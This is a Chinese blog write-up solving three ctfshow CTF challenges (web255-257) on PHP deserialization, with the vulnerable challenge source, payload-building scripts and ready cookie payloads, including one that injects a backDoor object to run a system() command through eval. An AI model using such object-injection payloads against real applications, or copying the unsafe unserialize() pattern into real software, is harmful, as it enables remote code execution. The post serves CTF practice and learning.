ctfshow web255 web 256 web257

已于 2022-07-02 00:48:58 修改
阅读量1.3k 收藏
点赞数 2
分类专栏: ctfshow刷题 反序列化 文章标签: 反序列化漏洞 反序列化 php 安全 web安全
于 2022-07-02 00:05:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45557476/article/details/125567595
版权

目录

web255

web256

web257

web255

附代码

<?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-02 17:44:47
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-02 19:29:02
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
*/
​
error_reporting(0);
highlight_file(__FILE__);
include('flag.php');
​
class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;
​
    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            echo "your flag is ".$flag;
        }else{
            echo "no vip, no flag";
        }
    }
}
​
$username=$_GET['username'];
$password=$_GET['password'];
​
if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);    
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}

整体的思路和上一题差不多只是多了一句

$user = unserialize($_COOKIE['user']);

可以看到unserialize就是反序列化,所以需要我们序列化一些东西,通过cookie的user变量传入,改变这个数据。

    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;

这段代码无法让isVip为true,所以我们就需要通过user这个变量改变isVip的值。

直接把类拿过来,只有类和变量会被反序列化,其他都可以去掉。

<?php
class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=true;
​
}
echo(urlencode(serialize(new ctfShowUser())));
?>

所以参入参数就是

拿到flag,债见!!

web256

附代码

<?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-02 17:44:47
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-02 19:29:02
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
*/
​
error_reporting(0);
highlight_file(__FILE__);
include('flag.php');
​
class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;
​
    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            if($this->username!==$this->password){
                    echo "your flag is ".$flag;
              }
        }else{
            echo "no vip, no flag";
        }
    }
}
​
$username=$_GET['username'];
$password=$_GET['password'];
​
if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);    
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}

这个题的关键点在于username和password不相等,因为都是强比较,所以我们传入的username和password值不同即可,这时候注意cookie中参入的user的username和password也要改

所以我们这时候传入的应该是

?username=1&password=2
<?php
class ctfShowUser{
    public $username='1';
    public $password='2';
    public $isVip=true;
​
}
echo(urlencode(serialize(new ctfShowUser())));
?>
O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22password%22%3Bs%3A1%3A%222%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

拿到flag,债见!

web257

附代码

<?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-02 17:44:47
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-02 20:33:07
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
*/
​
error_reporting(0);
highlight_file(__FILE__);
​
class ctfShowUser{
    private $username='xxxxxx';
    private $password='xxxxxx';
    private $isVip=false;
    private $class = 'info';
​
    public function __construct(){
        $this->class=new info();
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
        $this->class->getInfo();
    }
​
}
​
class info{
    private $user='xxxxxx';
    public function getInfo(){
        return $this->user;
    }
}
​
class backDoor{
    private $code;
    public function getInfo(){
        eval($this->code);
    }
}
​
$username=$_GET['username'];
$password=$_GET['password'];
​
if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);
    $user->login($username,$password);
}

这个题开始涉及反序列化的魔术方法了,我前面有文章写过php反序列化常用魔术方法的介绍

我们看回这个题,最后我们要用到的是backDoor类中的eval函数,来执行命令

结合上一个题的方法,循序渐进的看这个题,construct方法在初始化一个类的时候被触发,这里的construct方法会初始化info()这个类,在销毁时候触发destruct方法,destruct方法触发会调用info()类中的getInfo方法,然后返回user对象的值,这里我们看到我们想要调用的backDoor类中的方法也叫getInfo(),所以我们可以在序列化的时候把__construct方法初始化的类从info改为backDoor。

具体的实施方法如下:

<?php
class ctfShowUser{
    private $username='xxxxxx';
    private $password='xxxxxx';
    private $isVip=true;
    private $class = 'info';
​
    public function __construct(){
        $this->class=new backDoor();
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
        $this->class->getInfo();
    }
}
class backDoor{
    private $code='system("cat ./flag.php");';
    public function getInfo(){
        eval($this->code);
    }
}
echo(urlencode(serialize(new ctfShowUser())));

还是老规矩

?username=xxxxxx&password=xxxxxx
Cookie: user=O%3A11%3A%22ctfShowUser%22%3A4%3A%7Bs%3A21%3A%22%00ctfShowUser%00username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A21%3A%22%00ctfShowUser%00password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A18%3A%22%00ctfShowUser%00isVip%22%3Bb%3A1%3Bs%3A18%3A%22%00ctfShowUser%00class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A25%3A%22system%28%22cat+.%2Fflag.php%22%29%3B%22%3B%7D%7D

拿到flag,债见!!

姜小孩.
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTFshow 反序列化 web257
Kradress的博客
12-19 1863
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 20:33:07 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight
CTFshow 反序列化 web254
Kradress的博客
12-19 259
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight
ctfshow-web入门-爆破(web25)及php_mt_seed工具的安装与使用
Welcome To Myon'Blog !
06-03 727
rand)){ ,需要为真才会执行后面输出 flag 的语句,因此 $rand 需要为 0 ,而 $rand = intval($r)-intval(mt_rand());特别注意,这里的 mt_rand()+mt_rand() 是第二次和第三次生成的随机数之和,因为前面已经使用过一次 mt_rand() 了。我们令 r=0,就可以得到 $rand = -intval(mt_rand()),只要设置了 r,就会 echo $rand;都是一样的种子,但是第一次和第二次生成的随机数结果是不一样的。
ctfshow-web257(反序列化)
m0_62094846的博客
02-23 1840
__destruct()是PHP面向对象编程的另一个重要的魔法函数,该函数会在类的一个对象被删除时自动调用。 我们可以在该函数中添加一些释放资源的操作,比如关闭文件、关闭数据库链接、清空一个结果集等。其实,__destruct()在日常的编码中并不常见,因为它是非必须的,是类的可选组成部分。通常只是用来完成对象被删除时的清理动作而已。 类中的getinfo()方法通常用于获取一些信息。(java的,php的没找到) <?php /* # -*- coding: utf-8 -*- # ...
ctfshow web入门反序列化 web254-257
m0_62207170的博客
04-21 584
ctfshow web入门反序列化 web254-257
ctfshow 反序列化Web254-255
m0_62584974的博客
04-21 2249
2022/4/17 反序列化漏洞的产生主要有以下两个原因: 1. unserialize 函数的参数可控。 2.存在魔法函数。 魔法函数 __construct,__destruct,__call,__callStatic,__get,__set,__isset,__unset,__sleep,__wakeup,__toString,__invoke,__set_state,__clone和__debuginfo等成员函数在PHP中被称为魔法函数。在命名自己的类方法时不能使用这些名称,除非是想使用其
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
[WP/WEB/反序列化/未完]CTFshow-web257-268
車鈊的博客
10-12 976
Web257 <?php class ctfShowUser{ private $username='xxxxxx'; private $password='xxxxxx'; private $isVip=false; private $class = 'info'; public function __construct(){ $this->class=new backDoor(); } public function
CTFshow刷题日记 web 反序列化 web254-255
m0_73700261的博客
05-09 287
这个是源代码,这里的思路是这样的有两个get一个是username另一个是password,第一个if是检查是否有两个变量,接着就新建一个ctfShowUser的类,接着第二个if是一个$user->login($username,$password)对应上面的login($u,$p) 接着进入第三个if($user-checkVip())这里就进入到了$user->vipOneKeyGetFlag。cookie传入一个O:11:"ctfShowUser":1:{s:5:"isVip";
ctfshow-web256(反序列化)
m0_62094846的博客
02-23 614
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight_file(__FILE__.
CTFshow 反序列化 web256
Kradress的博客
12-19 428
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight
ctfshow web入门 反序列化(254~257详解)
WRplayeR的博客
04-12 432
php反序列化的简单学习
ctfshow反序列化web256
m0_62584974的博客
04-22 334
反序列化 Web256 题目有判断password和username相不相等 判断了才进行反序列化 <? //ctfshow 反序列化web256 class ctfShowUser{ public $username='1'; public $password='2'; public $isVip=ture; public function checkVip(){ return $this->isVip; }
CTFSHOW WEB入门
qq_51558360的博客
10-11 4466
----------信息搜集---------- 源码泄露 查看源码即可 前台JS绕过 直接开发者工具查看源码 当然也可以抓包查看 也可以禁用js查看源码 协议头信息泄露 或者抓一下包也可 robots后台泄露 phps源码泄露 根据题目猜测输入index.phps 下载到一个index.phps打开得到flag 源码压缩包泄露 访问www.zip 没有flag,尝试访问fl000g.txt 版本控制泄露源码 Git是一个开源的分布式版本控制系统 git代码泄露,git上传代码会在目录创
渗透学习-CTF篇-web-CTFshow(仅有部分,持续更新中,254-259关))
qq_43696276的博客
03-20 1486
本文将主要介绍CTFshow的关卡攻略,至于基本的原理请参考本人的其他介绍漏洞原理的博客。
RMI反序列化漏洞 修复
最新发布
06-08
RMI反序列化漏洞是一种常见的Java Web应用程序漏洞,攻击者可以利用该漏洞在目标服务器上执行任意代码。该漏洞利用的核心是Java的反序列化机制,攻击者可以通过构造特定的序列化对象来触发漏洞。 要修复RMI反序列化漏洞,需要进行以下步骤: 1. 升级Java版本:在较新版本的Java中,已经修复了一些反序列化漏洞,因此升级Java版本是一种简单有效的修复方法。 2. 序列化对象过滤:过滤掉不受信任的序列化对象,只反序列化可信任的对象,这样可以有效减少攻击面。 3. 自定义序列化/反序列化机制:使用自定义的序列化/反序列化机制,不使用Java默认的序列化/反序列化机制,可以避免一些常见的反序列化漏洞。 4. 对于不必要的远程方法调用接口,可以禁用或者限制远程方法调用。 5. 增强代码审计:对于可能存在RMI反序列化漏洞的代码,进行仔细审计和测试,以及使用一些工具来帮助检测潜在的漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

姜小孩.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值